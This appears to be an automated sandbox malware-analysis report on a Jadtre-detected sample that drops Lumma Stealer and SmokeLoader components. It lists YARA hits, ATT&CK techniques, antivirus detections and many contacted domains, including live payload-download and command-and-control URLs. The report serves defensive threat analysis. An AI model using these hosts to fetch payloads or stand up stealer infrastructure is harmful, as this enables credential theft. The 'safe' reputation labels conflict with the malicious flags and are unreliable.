Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\PIVFAGEAAV

Source: Yara match	File source: 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2731047551.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2640497026.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2365862383.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2631693692.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR

Remote Access Functionality

Yara detected Bdaejec

Source: Yara match	File source: Process Memory Space: IXDaI.exe PID: 7516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IXDaI.exe PID: 7708, type: MEMORYSTR

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 27.0.B552.exe.7ff75ee70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.B552.exe.7ff75ee70000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: B552.exe PID: 4016, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\B552.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	431 Windows Management Instrumentation	112 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	11 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	111 Input Capture	14 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	14 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Scheduled Task/Job	812 Process Injection	241 Obfuscated Files or Information	Security Account Manager	237 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	22 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	111 Input Capture	11 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Scheduled Task/Job	Network Logon Script	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	1161 Security Software Discovery	SSH	2 Clipboard Data	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	4 PowerShell	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	581 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	125 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	581 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	812 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
7Y18r(14).exe	95%	ReversingLabs	Win32.Virus.Jadtre
7Y18r(14).exe	100%	Avira	W32/Jadtre.B
7Y18r(14).exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Jadtre.B
C:\Users\user\AppData\Local\Temp\IXDaI.exe	100%	Avira	TR/Dldr.Small.Z.haljq
C:\Program Files\7-Zip\Uninstall.exe	100%	Avira	W32/Jadtre.B
C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXDaI.exe	100%	Joe Sandbox ML
C:\Program Files\7-Zip\Uninstall.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F6D9.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\B552.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\F6D9.exe	16%	ReversingLabs
C:\Users\user\AppData\Local\Temp\IXDaI.exe	92%	ReversingLabs	Win32.Trojan.Madeba
C:\Users\user\AppData\Roaming\ftejced	95%	ReversingLabs	Win32.Virus.Jadtre

Source	Detection	Scanner	Label
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ddos.dnsnb8.net:799/cj//k1.rar	100%	URL Reputation	malware
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://wns.windows.com/bat	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar	100%	Avira URL Cloud	phishing
http://www.activestate.comHolger	0%	Avira URL Cloud	safe
http://gebeus.ru/tmp/index.php	100%	Avira URL Cloud	malware
https://liernessfornicsa.shop/8	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0?	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Avira URL Cloud	safe
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w	0%	Avira URL Cloud	safe
callosallsaospz.shop	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin	0%	Avira URL Cloud	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700	0%	Avira URL Cloud	safe
http://ocsps.ssl.com0_	0%	Avira URL Cloud	safe
http://cx5519.com/tmp/index.php	100%	Avira URL Cloud	malware
http://www.spaceblue.com	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api1	0%	Avira URL Cloud	safe
http://www.develop.comDeepak	0%	Avira URL Cloud	safe
https://rentry.co	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta	0%	Avira URL Cloud	safe
http://evilos.cc/tmp/index.php	100%	Avira URL Cloud	malware
http://www.oberhumer.com	0%	Avira URL Cloud	safe
liernessfornicsa.shop	0%	Avira URL Cloud	safe
https://aka.ms/winsvr-2022-pshelp	0%	Avira URL Cloud	safe
https://107.173.160.139/	0%	Avira URL Cloud	safe
https://store4.gofile.io	0%	Avira URL Cloud	safe
http://www.activestate.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	0%	Avira URL Cloud	safe
shepherdlyopzc.shop	0%	Avira URL Cloud	safe
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/fD	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k5.rar	100%	Avira URL Cloud	phishing
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
http://www.spaceblue.comMathias	0%	Avira URL Cloud	safe
https://word.office.com576	0%	Avira URL Cloud	safe
upknittsoappz.shop	0%	Avira URL Cloud	safe
https://mussangroup.com/wp-content/images/pic1.jpg	100%	Avira URL Cloud	malware
http://www.lua.org	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	0%	Avira URL Cloud	safe
unseaffarignsk.shop	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k3.rar6	100%	Avira URL Cloud	phishing
http://html4/loose.dtd	0%	Avira URL Cloud	safe
https://api.msn.com/$	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/g	0%	Avira URL Cloud	safe
https://callosallsaospz.shop/api	100%	Avira URL Cloud	malware
http://ddos.dnsnb8.net:799/cj//k3.rarB	100%	Avira URL Cloud	malware
https://liernessfornicsa.shop/_	0%	Avira URL Cloud	safe
http://www.scintilla.org/scite.rng	0%	Avira URL Cloud	safe
https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/health/wellness/7-secrets-to-a-happy-old-age-backed-by-science/ss-AA1hwpvW	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k4.rarO	100%	Avira URL Cloud	phishing
http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	0%	Avira URL Cloud	safe
https://107.173.160.137/	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/api(	0%	Avira URL Cloud	safe
http://store4.gofile.io	0%	Avira URL Cloud	safe
https://rentry.co/microgods/raw	0%	Avira URL Cloud	safe
http://ddos.dnsnb8.net:799/cj//k2.rar	100%	Avira URL Cloud	phishing
lariatedzugspd.shop	0%	Avira URL Cloud	safe
http://www.baanboard.comBrendon	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	0%	Avira URL Cloud	safe
http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0	0%	Avira URL Cloud	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	0%	Avira URL Cloud	safe
https://www.smartsharesystems.com/	0%	Avira URL Cloud	safe
http://www.scintilla.org	0%	Avira URL Cloud	safe
http://.css	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
funrecipebooks.com	162.0.235.84	true	true	unknown
bg.microsoft.map.fastly.net	199.232.214.172	true	false	unknown
store4.gofile.io	31.14.70.245	true	false	unknown
evilos.cc	127.0.0.127	true	true	unknown
gebeus.ru	189.165.133.52	true	true	unknown
ddos.dnsnb8.net	44.221.84.105	true	false	unknown
rentry.co	104.26.3.16	true	true	unknown
liernessfornicsa.shop	172.67.213.85	true	true	unknown
mussangroup.com	185.149.100.242	true	true	unknown
callosallsaospz.shop	188.114.96.3	true	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ddos.dnsnb8.net:799/cj//k3.rar	false	Avira URL Cloud: phishing	unknown
http://gebeus.ru/tmp/index.php	true	Avira URL Cloud: malware	unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	false	Avira URL Cloud: safe	unknown
callosallsaospz.shop	true	Avira URL Cloud: safe	unknown
http://cx5519.com/tmp/index.php	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k1.rar	true	URL Reputation: malware	unknown
liernessfornicsa.shop	true	Avira URL Cloud: safe	unknown
http://evilos.cc/tmp/index.php	true	Avira URL Cloud: malware	unknown
https://107.173.160.139/	true	Avira URL Cloud: safe	unknown
shepherdlyopzc.shop	true	Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	Avira URL Cloud: safe	unknown
https://mussangroup.com/wp-content/images/pic1.jpg	true	Avira URL Cloud: malware	unknown
http://ddos.dnsnb8.net:799/cj//k5.rar	false	Avira URL Cloud: phishing	unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip	false	Avira URL Cloud: safe	unknown
unseaffarignsk.shop	true	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/api	false	Avira URL Cloud: malware	unknown
https://107.173.160.137/	true	Avira URL Cloud: safe	unknown
https://rentry.co/microgods/raw	false	Avira URL Cloud: safe	unknown
http://ddos.dnsnb8.net:799/cj//k2.rar	false	Avira URL Cloud: phishing	unknown
lariatedzugspd.shop	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/bat	explorer.exe, 0000000E.00000000.1447862980.0000000009730000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.activestate.comHolger	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000E.00000000.1444506660.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0?	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/8	lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin	explorer.exe, 0000000E.00000000.1449509463.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg	BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700	BitLockerToGo.exe, 0000001F.00000003.2408861121.0000000005441000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/money/companies/legacy-park-auction-canceled-liquidation-proposed-here-s-w	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0_	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://www.spaceblue.com	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/api1	BitLockerToGo.exe, 0000001F.00000002.2490089240.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2489374820.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta	lm.exe, 00000026.00000003.2710189734.0000000003138000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.develop.comDeepak	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	753F.exe, 0000001C.00000002.2708165528.000001C080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A67961000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, vm.exe, 00000025.00000002.3743090864.0000000002D49000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://rentry.co	753F.exe, 0000001C.00000002.2708165528.000001C080396000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.oberhumer.com	F6D9.exe	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000E.00000000.1447862980.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A68B86000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000020.00000002.2624078104.0000020A67D90000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store4.gofile.io	powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2624078104.0000020A690D1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000020.00000002.2624078104.0000020A67B87000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.activestate.com	SciTE.exe.5.dr	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000020.00000002.2668792904.0000020A779CA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE	IXDaI.exe, 00000005.00000002.1465941365.0000000000BA3000.00000002.00000001.01000000.00000004.sdmp, IXDaI.exe, 00000005.00000003.1268611401.0000000001120000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000003.1624080996.0000000001290000.00000004.00001000.00020000.00000000.sdmp, IXDaI.exe, 00000011.00000002.1679993688.0000000000EE3000.00000002.00000001.01000000.00000004.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	753F.exe.14.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.rootca1.amazontrust.com0:	BitLockerToGo.exe, 0000001F.00000003.2406241801.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2689264498.0000000003165000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc	explorer.exe, 0000000E.00000000.1445489824.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	BitLockerToGo.exe, 0000001F.00000003.2369274827.0000000005476000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2368524961.0000000005479000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 0000001F.00000003.2370710751.0000000005476000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000026.00000003.2643416050.000000000316E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/fD	lm.exe, 00000026.00000002.2895669741.0000000003127000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	lm.exe, 00000026.00000003.2693429073.000000000357C000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
